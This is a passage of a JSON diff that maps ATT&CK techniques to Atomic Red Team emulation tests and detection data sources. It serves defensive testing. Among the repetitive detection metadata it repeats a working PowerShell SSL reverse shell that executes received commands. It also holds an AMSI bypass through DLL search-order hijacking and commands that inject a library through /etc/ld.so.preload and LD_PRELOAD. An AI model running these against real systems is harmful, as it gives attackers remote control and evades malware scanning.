level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1573", + "command_list": [ + "$server_ip = 127.0.0.1\n$server_port = #{server_port}\n$socket = New-Object Net.Sockets.TcpClient('127.0.0.1', '#{server_port}')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> ')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n", + "$server_ip = #{server_ip}\n$server_port = 443\n$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '443')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> 
')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n" + ], + "commands": [ + { + "command": "$server_ip = 127.0.0.1\n$server_port = #{server_port}\n$socket = New-Object Net.Sockets.TcpClient('127.0.0.1', '#{server_port}')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> ')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n", + "source": "atomics/T1573/T1573.yaml", + "name": "Atomic Red Team Test - Encrypted Channel" + }, + { + "command": "$server_ip = #{server_ip}\n$server_port = 443\n$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '443')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> ')\n$writer.flush()\n[byte[]]$bytes = 
0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n", + "source": "atomics/T1573/T1573.yaml", + "name": "Atomic Red Team Test - Encrypted Channel" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1573", + "display_name": "Encrypted Channel", + "atomic_tests": [ + { + "name": "OpenSSL C2", + "auto_generated_guid": "21caf58e-87ad-440c-a6b8-3ac259964003", + "description": "Thanks to @OrOneEqualsOne for this quick C2 method.\nThis is to test to see if a C2 session can be established using an SSL socket.\nMore information about this technique, including how to set up the listener, can be found here:\nhttps://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926\n\nUpon successful execution, powershell will make a network connection to 127.0.0.1 over 443.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "server_ip": { + "description": "IP of the external server", + "type": "String", + "default": "127.0.0.1" + }, + "server_port": { + "description": "The port to connect to on the external server", + "type": "String", + "default": "443" + } + }, + "executor": { + "command": "$server_ip = #{server_ip}\n$server_port = #{server_port}\n$socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')\n$stream = $socket.GetStream()\n$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))\n$sslStream.AuthenticateAsClient('fakedomain.example', $null, \"Tls12\", $false)\n$writer = new-object System.IO.StreamWriter($sslStream)\n$writer.Write('PS ' + (pwd).Path + '> 
')\n$writer.flush()\n[byte[]]$bytes = 0..65535|%{0};\nwhile(($i = $sslStream.Read($bytes, 0, $bytes.Length)) -ne 0)\n{$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);\n$sendback = (iex $data | Out-String ) 2>&1;\n$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';\n$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);\n$sslStream.Write($sendbyte,0,$sendbyte.Length);$sslStream.Flush()}\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1574.001", + "command_list": [ + "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\updater.exe\ncopy %windir%\\System32\\amsi.dll %APPDATA%\\amsi.dll\n%APPDATA%\\updater.exe -Command exit\n" + ], + "commands": [ + { + "command": "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\updater.exe\ncopy %windir%\\System32\\amsi.dll %APPDATA%\\amsi.dll\n%APPDATA%\\updater.exe -Command exit\n", + "source": "atomics/T1574.001/T1574.001.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: DLL Search Order Hijacking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.001", + "display_name": "Hijack Execution Flow: DLL Search Order Hijacking", + 
"atomic_tests": [ + { + "name": "DLL Search Order Hijacking - amsi.dll", + "auto_generated_guid": "8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3", + "description": "Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)\nhttps://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/\n\nUpon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy %windir%\\System32\\windowspowershell\\v1.0\\powershell.exe %APPDATA%\\updater.exe\ncopy %windir%\\System32\\amsi.dll %APPDATA%\\amsi.dll\n%APPDATA%\\updater.exe -Command exit\n", + "cleanup_command": "del %APPDATA%\\updater.exe >nul 2>&1\ndel %APPDATA%\\amsi.dll >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1574.002", + "command_list": [ + "#{gup_executable}\n", + "PathToAtomicsFolder\\T1574.002\\bin\\GUP.exe\n" + ], + "commands": [ + { + "command": "#{gup_executable}\n", + "source": "atomics/T1574.002/T1574.002.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: DLL Side-Loading" + }, + { + "command": "PathToAtomicsFolder\\T1574.002\\bin\\GUP.exe\n", + "source": "atomics/T1574.002/T1574.002.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: DLL Side-Loading" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.002", + "display_name": "Hijack Execution Flow: DLL Side-Loading", + "atomic_tests": [ + { + "name": "DLL Side-Loading using the Notepad++ GUP.exe binary", + "auto_generated_guid": "65526037-7079-44a9-bda1-2cb624838040", + "description": "GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.\nUpon execution, calc.exe will be opened.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_name": { + "description": "Name of the created process", + "type": "String", + "default": "calculator.exe" + }, + "gup_executable": { + "description": "GUP is an open source signed binary used by Notepad++ for software updates", + "type": "Path", + "default": "PathToAtomicsFolder\\T1574.002\\bin\\GUP.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Gup.exe binary must exist on disk at specified location (#{gup_executable})\n", + "prereq_command": "if (Test-Path #{gup_executable}) {exit 0} else {exit 1}\n", + 
"get_prereq_command": "New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true\" -OutFile \"#{gup_executable}\"\n" + } + ], + "executor": { + "command": "#{gup_executable}\n", + "cleanup_command": "taskkill /F /IM #{process_name} >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": 
"Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1574.006", + "command_list": [ + "sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'\n", + "sudo sh -c 'echo /tmp/T1574006.so > /etc/ld.so.preload'\n", + "LD_PRELOAD=#{path_to_shared_library} ls\n", + "LD_PRELOAD=/tmp/T1574006.so ls\n" + ], + "commands": [ + { + "command": "sudo sh -c 'echo #{path_to_shared_library} > /etc/ld.so.preload'\n", + "source": "atomics/T1574.006/T1574.006.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: LD_PRELOAD" + }, + { + "command": "sudo sh -c 'echo /tmp/T1574006.so > /etc/ld.so.preload'\n", + "source": "atomics/T1574.006/T1574.006.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: LD_PRELOAD" + }, + { + "command": "LD_PRELOAD=#{path_to_shared_library} ls\n", + "source": "atomics/T1574.006/T1574.006.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: 
LD_PRELOAD" + }, + { + "command": "LD_PRELOAD=/tmp/T1574006.so ls\n", + "source": "atomics/T1574.006/T1574.006.yaml", + "name": "Atomic Red Team Test - Hijack Execution Flow: LD_PRELOAD" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1574.006", + "display_name": "Hijack Execution Flow: LD_PRELOAD", + "atomic_tests": [ + { + "name": "Shared Library Injection via /etc/ld.so.preload", + "auto_generated_guid": "39cb0e67-dd0d-4b74-a74b-c072db7ae991", + "description": "This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. \n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_shared_library_source": { + "description": "Path to a shared library source code", + "type": "Path", + "default": "PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c" + }, + "path_to_shared_library": { + "description": "Path to a shared library object", + "type": "Path", + "default": "/tmp/T1574006.so" + } + }, + "dependency_executor_name": 